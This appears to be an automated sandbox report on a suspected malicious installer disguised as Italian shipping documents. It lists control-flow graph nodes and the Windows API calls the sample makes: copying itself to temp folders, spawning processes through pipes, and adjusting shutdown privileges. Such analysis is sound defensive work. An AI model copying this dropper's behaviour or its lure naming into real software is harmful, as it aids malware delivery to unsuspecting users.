403501 12 API calls 3733->3737 3808 403082 GetTickCount GetModuleFileNameW 3734->3808 3735 405e53 CharNextW 3735->3736 3736->3729 3736->3735 3742 4037f2 3736->3742 3739 40383c 3737->3739 3739->3734 3741 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3739->3741 3740 40388a 3748 405e53 CharNextW 3740->3748 3779 403931 3740->3779 3787 403941 3740->3787 3743 403501 12 API calls 3741->3743 3892 406557 lstrcpynW 3742->3892 3746 40386e 3743->3746 3746->3734 3746->3787 3753 4038a9 3748->3753 3750 403ab3 3754 403b37 ExitProcess 3750->3754 3755 403abb GetCurrentProcess OpenProcessToken 3750->3755 3751 403a8f 3904 405bb7 3751->3904 3758 403907 3753->3758 3759 40394a 3753->3759 3756 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3755->3756 3757 403b07 3755->3757 3756->3757 3763 40694b 5 API calls 3757->3763 3764 405f2e 18 API calls 3758->3764 3762 405b22 5 API calls 3759->3762 3765 40394f lstrlenW 3762->3765 3766 403b0e 3763->3766 3767 403913 3764->3767 3895 406557 lstrcpynW 3765->3895 3769 403b23 ExitWindowsEx 3766->3769 3771 403b30 3766->3771 3767->3787 3893 406557 lstrcpynW 3767->3893 3769->3754 3769->3771 3770 403969 3773 403981 3770->3773 3896 406557 lstrcpynW 3770->3896 3908 40140b 3771->3908 3778 4039a7 wsprintfW 3773->3778 3793 4039d3 3773->3793 3775 403926 3894 406557 lstrcpynW 3775->3894 3780 406594 21 API calls 3778->3780 3836 403c29 3779->3836 3780->3773 3781 405aab 2 API calls 3781->3793 3782 405b05 2 API calls 3782->3793 3783 4039e3 GetFileAttributesW 3785 4039ef DeleteFileW 3783->3785 3783->3793 3784 403a1d SetCurrentDirectoryW 3786 406317 40 API calls 3784->3786 3785->3793 3788 403a2c CopyFileW 3786->3788 3897 403b4f 3787->3897 3788->3787 3788->3793 3789 405c63 71 API calls 3789->3793 3790 406317 40 API calls 3790->3793 3791 406594 21 API calls 3791->3793 3792 405b3a 2 API calls 3792->3793 3793->3773 3793->3778 3793->3781 3793->3782 3793->3783 3793->3784 3793->3787 3793->3789 3793->3790 3793->3791 3793->3792 3794 403aa5 CloseHandle 3793->3794 3795 4068b4 2 API calls 3793->3795 3794->3787 3795->3793 3796->3724 3797->3726 3799 406805 5 API calls 3798->3799 3801 40350d 3799->3801 3800 403517 3800->3732 3801->3800 3802 405e26 3 API calls 3801->3802 3803 40351f 3802->3803 3804 405b05 2 API calls 3803->3804 3805 403525 3804->3805 3806 406076 2 API calls 3805->3806 3807 403530 3806->3807 3807->3732 3911 406047 GetFileAttributesW CreateFileW 3808->3911 3810 4030c2 3828 4030d2 3810->3828 3912 406557 lstrcpynW 3810->3912 3812 4030e8 3813 405e72 2 API calls 3812->3813 3814 4030ee 3813->3814 3913 406557 lstrcpynW 3814->3913 3816 4030f9 GetFileSize 3817 4031f3 3816->3817 3830 403110 3816->3830 3914 40301e 3817->3914 3819 4031fc 3821 40322c GlobalAlloc 3819->3821 3819->3828 3926 4034ea SetFilePointer 3819->3926 3820 4034d4 ReadFile 3820->3830 3925 4034ea SetFilePointer 3821->3925 3823 40325f 3827 40301e 6 API calls 3823->3827 3825 403215 3829 4034d4 ReadFile 3825->3829 3826 403247 3831 4032b9 35 API calls 3826->3831 3827->3828 3828->3740 3832 403220 3829->3832 3830->3817 3830->3820 3830->3823 3830->3828 3833 40301e 6 API calls 3830->3833 3834 403253 3831->3834 3832->3821 3832->3828 3833->3830 3834->3828 3834->3834 3835 403290 SetFilePointer 3834->3835 3835->3828 3837 40694b 5 API calls 3836->3837 3838 403c3d 3837->3838 3839 403c43 3838->3839 3840 403c55 3838->3840 3942 40649e wsprintfW 3839->3942 3841 406425 3 API calls 3840->3841 3842 403c85 3841->3842 3844 403ca4 lstrcatW 3842->3844 3846 406425 3 API calls 3842->3846 3845 403c53 3844->3845 3927 403eff 3845->3927 3846->3844 3849 405f2e 18 API calls 3850 403cd6 3849->3850 3851 403d6a 3850->3851 3853 406425 3 API calls 3850->3853 3852 405f2e 18 API calls 3851->3852 3854 403d70 3852->3854 3855 403d08 3853->3855 3856 403d80 LoadImageW 3854->3856 3857 406594 21 API calls 3854->3857 3855->3851 3860 403d29 lstrlenW 3855->3860 3864 405e53 CharNextW 3855->3864 3858 403e26 3856->3858 3859 403da7 RegisterClassW 3856->3859 3857->3856 3863 40140b 2 API calls 3858->3863 3861 403e30 3859->3861 3862 403ddd SystemParametersInfoW CreateWindowExW 3859->3862 3865 403d37 lstrcmpiW 3860->3865 3866 403d5d 3860->3866 3861->3787 3862->3858 3867 403e2c 3863->3867 3869 403d26 3864->3869 3865->3866 3870 403d47 GetFileAttributesW 3865->3870 3868 405e26 3 API calls 3866->3868 3867->3861 3871 403eff 22 API calls 3867->3871 3872 403d63 3868->3872 3869->3860 3873 403d53 3870->3873 3874 403e3d 3871->3874 3943 406557 lstrcpynW 3872->3943 3873->3866 3876 405e72 2 API calls 3873->3876 3877 403e49 ShowWindow 3874->3877 3878 403ecc 3874->3878 3876->3866 3880 4068db 3 API calls 3877->3880 3935 4056af OleInitialize 3878->3935 3882 403e61 3880->3882 3881 403ed2 3883 403ed6 3881->3883 3884 403eee 3881->3884 3885 403e6f GetClassInfoW 3882->3885 3887 4068db 3 API calls 3882->3887 3883->3861 3890 40140b 2 API calls 3883->3890 3886 40140b 2 API calls 3884->3886 3888 403e83 GetClassInfoW RegisterClassW 3885->3888 3889 403e99 DialogBoxParamW 3885->3889 3886->3861 3887->3885 3888->3889 3891 40140b 2 API calls 3889->3891 3890->3861 3891->3861 3892->3730 3893->3775 3894->3779 3895->3770 3896->3773 3898 403b67 3897->3898 3899 403b59 CloseHandle 3897->3899 3955 403b94 3898->3955 3899->3898 3902 405c63 71 API calls 3903 403a82 OleUninitialize 3902->3903 3903->3750 3903->3751 3907 405bcc 3904->3907 3905 403a9d ExitProcess 3906 405be0 MessageBoxIndirectW 3906->3905 3907->3905 3907->3906 3909 401389 2 API calls 3908->3909 3910 401420 3909->3910 3910->3754 3911->3810 3912->3812 3913->3816 3915 403027 3914->3915 3916 40303f 3914->3916 3919 403030 DestroyWindow 3915->3919 3920 403037 3915->3920 3917 403047 3916->3917 3918 40304f GetTickCount 3916->3918 3921 406987 2 API calls 3917->3921 3922 403080 3918->3922 3923 40305d CreateDialogParamW ShowWindow 3918->3923 3919->3920 3920->3819 3924 40304d 3921->3924 3922->3819 3923->3922 3924->3819 3925->3826 3926->3825 3928 403f13 3927->3928 3944 40649e wsprintfW 3928->3944 3930 403f84 3945 403fb8 3930->3945 3932 403cb4 3932->3849 3933 403f89 3933->3932 3934 406594 21 API calls 3933->3934 3934->3933 3948 404522 3935->3948 3937 404522 SendMessageW 3938 40570b OleUninitialize 3937->3938 3938->3881 3939 4056d2 3941 4056f9 3939->3941 3951 401389 3939->3951 3941->3937 3942->3845 3943->3851 3944->3930 3946 406594 21 API calls 3945->3946 3947 403fc6 SetWindowTextW 3946->3947 3947->3933 3949 40453a 3948->3949 3950 40452b SendMessageW 3948->3950 3949->3939 3950->3949 3953 401390 3951->3953 3952 4013fe 3952->3939 3953->3952 3954 4013cb MulDiv SendMessageW 3953->3954 3954->3953 3956 403ba2 3955->3956 3957 403b6c 3956->3957 3958 403ba7 FreeLibrary GlobalFree 3956->3958 3957->3902 3958->3957 3958->3958 4814 401a35 4815 402dab 21 API calls 4814->4815 4816 401a3e ExpandEnvironmentStringsW 4815->4816 4817 401a52 4816->4817 4819 401a65 4816->4819 4818 401a57 lstrcmpW 4817->4818 4817->4819 4818->4819 4825 4023b7 4826 4023c5 4825->4826 4827 4023bf 4825->4827 4829 4023d3 4826->4829 4830 402dab 21 API calls 4826->4830 4828 402dab 21 API calls 4827->4828 4828->4826 4831 402dab 21 API calls 4829->4831 4833 4023e1 4829->4833 4830->4829 4831->4833 4832 402dab 21 API calls 4834 4023ea WritePrivateProfileStringW 4832->4834 4833->4832 4835 4014b8 4836 4014be 4835->4836 4837 401389 2 API calls 4836->4837 4838 4014c6 4837->4838 4096 402439 4097 402441 4096->4097 4098 40246c 4096->4098 4100 402deb 21 API calls 4097->4100 4099 402dab 21 API calls 4098->4099 4101 402473 4099->4101 4102 402448 4100->4102 4108 402e69 4101->4108 4103 402452 4102->4103 4107 402480 4102->4107 4105 402dab 21 API calls 4103->4105 4106 402459 RegDeleteValueW RegCloseKey 4105->4106 4106->4107 4109 402e7d 4108->4109 4110 402e76 4108->4110 4109->4110 4112 402eae 4109->4112 4110->4107 4113 4063c4 RegOpenKeyExW 4112->4113 4114 402edc 4113->4114 4115 402f91 4114->4115 4116 402ee6 4114->4116 4115->4110 4117 402eec RegEnumValueW 4116->4117 4121 402f0f 4116->4121 4118 402f76 RegCloseKey 4117->4118 4117->4121 4118->4115 4119 402f4b RegEnumKeyW 4120 402f54 RegCloseKey 4119->4120 4119->4121 4122 40694b 5 API calls 4120->4122 4121->4118 4121->4119 4121->4120 4123 402eae 6 API calls 4121->4123 4124 402f64 4122->4124 4123->4121 4125 402f86 4124->4125 4126 402f68 RegDeleteKeyW 4124->4126 4125->4115 4126->4115 4127 40173a 4128 402dab 21 API calls 4127->4128 4129 401741 SearchPathW 4128->4129 4130 40175c 4129->4130 4839 401d3d 4840 402d89 21 API calls 4839->4840 4841 401d44 4840->4841 4842 402d89 21 API calls 4841->4842 4843 401d50 GetDlgItem 4842->4843 4844 40263d 4843->4844

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 73a91096-73a910e2 call 73a91987 3 73a910e8-73a9112c GetModuleFileNameW GlobalAlloc 0->3 4 73a9122d-73a91244 GlobalAlloc 0->4 5 73a9112f-73a91133 3->5 6 73a91247-73a9125d 4->6 7 73a9114f-73a91157 5->7 8 73a91135-73a9114d CharPrevW 5->8 9 73a9125f-73a91279 FindWindowExW * 2 6->9 10 73a9127e 6->10 12 73a91159-73a9116a call 73a91c8c GlobalFree 7->12 13 73a9116f-73a911a0 GetTempFileNameW CopyFileW 7->13 8->5 8->7 9->10 11 73a91284-73a91299 call 73a91c4c call 73a91a61 10->11 25 73a9129b-73a912a8 call 73a91ac7 11->25 26 73a912aa-73a912b4 lstrcmpiW 11->26 23 73a91825-73a91829 12->23 16 73a9120b-73a9122b lstrcatW lstrlenW 13->16 17 73a911a2-73a911d5 CreateFileW CreateFileMappingW MapViewOfFile 13->17 16->6 20 73a911fd-73a91205 CloseHandle * 2 17->20 21 73a911d7-73a911f7 UnmapViewOfFile 17->21 20->16 21->20 31 73a912d2-73a912d5 25->31 28 73a912bf-73a912c9 lstrcmpiW 26->28 29 73a912b6-73a912bd 26->29 32 73a912cb 28->32 33 73a912d7-73a912da 28->33 29->31 31->11 32->31 34 73a91308-73a9138e GetVersion 33->34 35 73a912dc-73a912ec call 73a91c8c 33->35 36 73a91390-73a91393 34->36 37 73a913c7-73a913d3 34->37 44 73a912ee 35->44 45 73a912f2-73a912f5 35->45 40 73a9139e 36->40 41 73a91395-73a9139c 36->41 42 73a913fe-73a91415 CreatePipe 37->42 43 73a913d5-73a913fb InitializeSecurityDescriptor SetSecurityDescriptorDacl 37->43 46 73a913a3-73a913be GlobalAlloc 40->46 41->46 47 73a91484-73a91496 lstrcpyW 42->47 48 73a91417-73a91428 CreatePipe 42->48 43->42 44->45 51 73a91300 45->51 52 73a912f7-73a912fa DeleteFileW 45->52 46->47 53 73a913c4 46->53 50 73a91762-73a91765 47->50 48->47 49 73a9142a-73a91482 GetStartupInfoW CreateProcessW 48->49 49->47 54 73a9149b-73a914a1 GetTickCount 49->54 55 73a9176f-73a91772 50->55 56 73a91767-73a9176a call 73a91c8c 50->56 51->34 52->51 53->37 57 73a914a4-73a914be WaitForSingleObject GetExitCodeProcess 54->57 59 73a91774-73a9177a 55->59 60 73a91787-73a9178e 55->60 56->55 63 73a914c4-73a914d8 PeekNamedPipe 57->63 59->60 64 73a9177c-73a91786 call 73a91a01 59->64 61 73a91790-73a9179c lstrcpyW 60->61 62 73a917a2-73a917a9 60->62 61->62 65 73a917ab-73a917c0 wsprintfW 62->65 66 73a917c3-73a917fc call 73a91c8c CloseHandle * 6 62->66 67 73a9170a-73a9170d 63->67 68 73a914de-73a9151e GetTickCount ReadFile 63->68 64->60 65->66 83 73a917fe 66->83 84 73a91802-73a91805 66->84 71 73a9175f 67->71 72 73a9170f-73a91714 67->72 74 73a91538-73a9153b 68->74 75 73a91520-73a91522 68->75 71->50 76 73a9174a-73a91752 Sleep 72->76 77 73a91716-73a91723 GetTickCount 72->77 80 73a91541-73a91544 74->80 81 73a91757-73a9175a 74->81 75->74 79 73a91524-73a91535 IsTextUnicode 75->79 76->57 77->76 82 73a91725-73a91745 TerminateProcess lstrcpyW 77->82 79->74 80->57 85 73a9154a-73a91555 80->85 81->57 82->57 83->84 86 73a91810-73a9181e GlobalFree 84->86 87 73a91807-73a9180a DeleteFileW 84->87 88 73a91557-73a91567 85->88 86->23 89 73a91820-73a91823 GlobalFree 86->89 87->86 88->63 90 73a9156d-73a91570 88->90 89->23 91 73a91592-73a91595 90->91 92 73a91572-73a91576 90->92 93 73a915cc 91->93 94 73a91597-73a915a5 IsDBCSLeadByteEx 91->94 92->63 95 73a9157c-73a9157f 92->95 98 73a915d0-73a915d6 93->98 96 73a915a7-73a915b0 94->96 97 73a915b6-73a915ca MultiByteToWideChar 94->97 99 73a9158d-73a91590 95->99 100 73a91581-73a9158b 95->100 96->63 96->97 101 73a915d7-73a915dc 97->101 98->101 99->88 100->98 102 73a9160a-73a9160f 101->102 103 73a915de-73a915e1 101->103 106 73a91611-73a91614 102->106 107 73a91616-73a9161b 102->107 104 73a9163b-73a9163d 103->104 105 73a915e3-73a915e6 103->105 108 73a9166d-73a91670 104->108 109 73a9163f-73a91643 104->109 105->108 110 73a915ec-73a91608 lstrcpyW 105->110 106->107 111 73a9165d-73a91668 106->111 107->104 112 73a9161d-73a91620 107->112 114 73a916a9-73a916b3 108->114 115 73a91672-73a9168e GlobalReAlloc 108->115 109->111 113 73a91645-73a91658 109->113 110->111 111->88 112->104 116 73a91622-73a91639 call 73a91a01 112->116 113->113 118 73a9165a 113->118 121 73a916d3-73a916ea call 73a91948 114->121 122 73a916b5-73a916c6 call 73a9182a 114->122 119 73a916ec-73a91705 lstrcpyW 115->119 120 73a91690-73a916a4 115->120 116->111 118->111 119->57 120->85 127 73a916cb-73a916ce 121->127 122->127 127->57
                                        APIs
                                          • Part of subcall function 73A91987: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,73A910E0), ref: 73A91990
                                          • Part of subcall function 73A91987: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,73A910E0), ref: 73A9199E
                                          • Part of subcall function 73A91987: GetProcAddress.KERNEL32(00000000,?), ref: 73A919BD
                                        • GetModuleFileNameW.KERNEL32(?,00000104), ref: 73A910FA
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 73A91112
                                        • CharPrevW.USER32(?,?), ref: 73A9113D
                                        • GlobalFree.KERNEL32(00000000), ref: 73A91164
                                        • GetTempFileNameW.KERNEL32(?,73A93088,00000000,?), ref: 73A91182
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 73A91198
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 73A911B0
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 73A911BF
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 73A911CD
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 73A911F7
                                        • CloseHandle.KERNEL32(00000000), ref: 73A911FE
                                        • CloseHandle.KERNEL32(00000000), ref: 73A91205
                                        • lstrcatW.KERNEL32(?,73A93084), ref: 73A91214
                                        • lstrlenW.KERNEL32(?), ref: 73A9121B
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 73A9123C
                                        • FindWindowExW.USER32(0001043A,00000000,#32770,00000000), ref: 73A91274
                                        • FindWindowExW.USER32(00000000), ref: 73A91277
                                        • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 73A912B0
                                        • lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 73A912C5
                                        • DeleteFileW.KERNEL32(?,error), ref: 73A912FA
                                        • GetVersion.KERNEL32 ref: 73A91340
                                        • GlobalAlloc.KERNEL32(00000040,00000FFE), ref: 73A913B0
                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 73A913DE
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 73A913EF
                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 73A91411
                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 73A91424
                                        • GetStartupInfoW.KERNEL32(00000044), ref: 73A91431
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 73A9147A
                                        • lstrcpyW.KERNEL32(?,error), ref: 73A91490
                                        • GetTickCount.KERNEL32 ref: 73A9149B
                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 73A914AB
                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 73A914BE
                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 73A914CF
                                        • GetTickCount.KERNEL32 ref: 73A914DE
                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 73A91503
                                        • IsTextUnicode.ADVAPI32(73A930B8,?,00000000), ref: 73A91529
                                        • IsDBCSLeadByteEx.KERNEL32(?,?), ref: 73A9159D
                                        • MultiByteToWideChar.KERNEL32(?,00000000,73A930B8,00000001,?,00000002), ref: 73A915C4
                                        • lstrcpyW.KERNEL32(?, ), ref: 73A915F4
                                        • GlobalReAlloc.KERNEL32(00000002,00000402,00000042), ref: 73A91686
                                          • Part of subcall function 73A91948: CharNextExA.USER32(?,0000000A,00000000,73A930B8,?,73A916EA,?,00000002,00000002,0000000A), ref: 73A91974
                                        • lstrcpyW.KERNEL32(?,error), ref: 73A916F8
                                        • GetTickCount.KERNEL32 ref: 73A91716
                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 73A9172D
                                        • lstrcpyW.KERNEL32(?,timeout), ref: 73A9173F
                                        • Sleep.KERNELBASE(00000064), ref: 73A9174C
                                        • lstrcpyW.KERNEL32(?,error), ref: 73A9179C
                                        • wsprintfW.USER32 ref: 73A917BA
                                        • CloseHandle.KERNEL32(?,?), ref: 73A917D8
                                        • CloseHandle.KERNEL32(?), ref: 73A917E0
                                        • CloseHandle.KERNEL32(?), ref: 73A917E5
                                        • CloseHandle.KERNEL32(?), ref: 73A917EA
                                        • CloseHandle.KERNEL32(?), ref: 73A917EF
                                        • CloseHandle.KERNEL32(?), ref: 73A917F4
                                        • DeleteFileW.KERNEL32(?), ref: 73A9180A
                                        • GlobalFree.KERNEL32(?), ref: 73A91819
                                        • GlobalFree.KERNEL32(00000002), ref: 73A91823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true
                                        • Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CharCountFreePipeTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
                                        • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
                                        • API String ID: 351676774-2772347907
                                        • Opcode ID: 924b82c5b415ad69fb06f15279b887df5a8ea9f1ba528186183951e71b7777ab
                                        • Instruction ID: 637e36d48234b509fe6dd83c6be6c8eed5ddec0159c8fd92c1edef953769652e
                                        • Opcode Fuzzy Hash: 924b82c5b415ad69fb06f15279b887df5a8ea9f1ba528186183951e71b7777ab
                                        • Instruction Fuzzy Hash: 7A323A72D0020DEFEB119FA5C986B9DBBF9FF08344F16406AE50AB6284DB305A45CF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 128 403532-403584 SetErrorMode GetVersionExW 129 403586-4035b6 GetVersionExW 128->129 130 4035be-4035c3 128->130 129->130 131 4035c5 130->131 132 4035cb-40360d 130->132 131->132 133 403620 132->133 134 40360f-403617 call 40694b 132->134 136 403625-403639 call 4068db lstrlenA 133->136 134->133 140 403619 134->140 141 40363b-403657 call 40694b * 3 136->141 140->133 148 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 141->148 149 403659-40365f 141->149 156 4036d5-4036e9 call 405e53 CharNextW 148->156 157 4036ce-4036d0 148->157 149->148 153 403661 149->153 153->148 160 4037e4-4037ea 156->160 157->156 161 4037f0 160->161 162 4036ee-4036f4 160->162 165 403804-40381e GetTempPathW call 403501 161->165 163 4036f6-4036fb 162->163 164 4036fd-403704 162->164 163->163 163->164 166 403706-40370b 164->166 167 40370c-403710 164->167 172 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 165->172 173 403876-403890 DeleteFileW call 403082 165->173 166->167 170 4037d1-4037e0 call 405e53 167->170 171 403716-40371c 167->171 170->160 189 4037e2-4037e3 170->189 175 403736-40376f 171->175 176 40371e-403725 171->176 172->173 192 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 172->192 194 403896-40389c 173->194 195 403a7d-403a8d call 403b4f OleUninitialize 173->195 182 403771-403776 175->182 183 40378c-4037c6 175->183 180 403727-40372a 176->180 181 40372c 176->181 180->175 180->181 181->175 182->183 184 403778-403780 182->184 186 4037c8-4037cc 183->186 187 4037ce-4037d0 183->187 190 403782-403785 184->190 191 403787 184->191 186->187 193 4037f2-4037ff call 406557 186->193 187->170 189->160 190->183 190->191 191->183 192->173 192->195 193->165 198 4038a2-4038ad call 405e53 194->198 199 403935-40393c call 403c29 194->199 205 403ab3-403ab9 195->205 206 403a8f-403a9f call 405bb7 ExitProcess 195->206 210 4038fb-403905 198->210 211 4038af-4038e4 198->211 208 403941-403945 199->208 212 403b37-403b3f 205->212 213 403abb-403ad1 GetCurrentProcess OpenProcessToken 205->213 208->195 216 403907-403915 call 405f2e 210->216 217 40394a-403970 call 405b22 lstrlenW call 406557 210->217 221 4038e6-4038ea 211->221 218 403b41 212->218 219 403b45-403b49 ExitProcess 212->219 214 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 213->214 215 403b07-403b15 call 40694b 213->215 214->215 232 403b23-403b2e ExitWindowsEx 215->232 233 403b17-403b21 215->233 216->195 234 40391b-403931 call 406557 * 2 216->234 238 403981-403999 217->238 239 403972-40397c call 406557 217->239 218->219 223 4038f3-4038f7 221->223 224 4038ec-4038f1 221->224 223->221 228 4038f9 223->228 224->223 224->228 228->210 232->212 236 403b30-403b32 call 40140b 232->236 233->232 233->236 234->199 236->212 244 40399e-4039a2 238->244 239->238 246 4039a7-4039d1 wsprintfW call 406594 244->246 250 4039d3-4039d8 call 405aab 246->250 251 4039da call 405b05 246->251 254 4039df-4039e1 250->254 251->254 256 4039e3-4039ed GetFileAttributesW 254->256 257 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 254->257 258 403a0e-403a19 256->258 259 4039ef-4039f8 DeleteFileW 256->259 265 403a7b 257->265 266 403a3e-403a5f call 406317 call 406594 call 405b3a 257->266 258->244 262 403a1b 258->262 259->258 261 4039fa-403a0c call 405c63 259->261 261->246 261->258 262->195 265->195 274 403a61-403a6b 266->274 275 403aa5-403ab1 CloseHandle 266->275 274->265 276 403a6d-403a75 call 4068b4 274->276 275->265 276->246 276->265
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 00403555
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                        • OleInitialize.OLE32(00000000), ref: 00403670
                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00000020,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                        • wsprintfW.USER32 ref: 004039B1
                                        • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                        • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                          • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                          • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                          • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                        • ExitProcess.KERNEL32 ref: 00403A9F
                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                        • ExitProcess.KERNEL32 ref: 00403B49
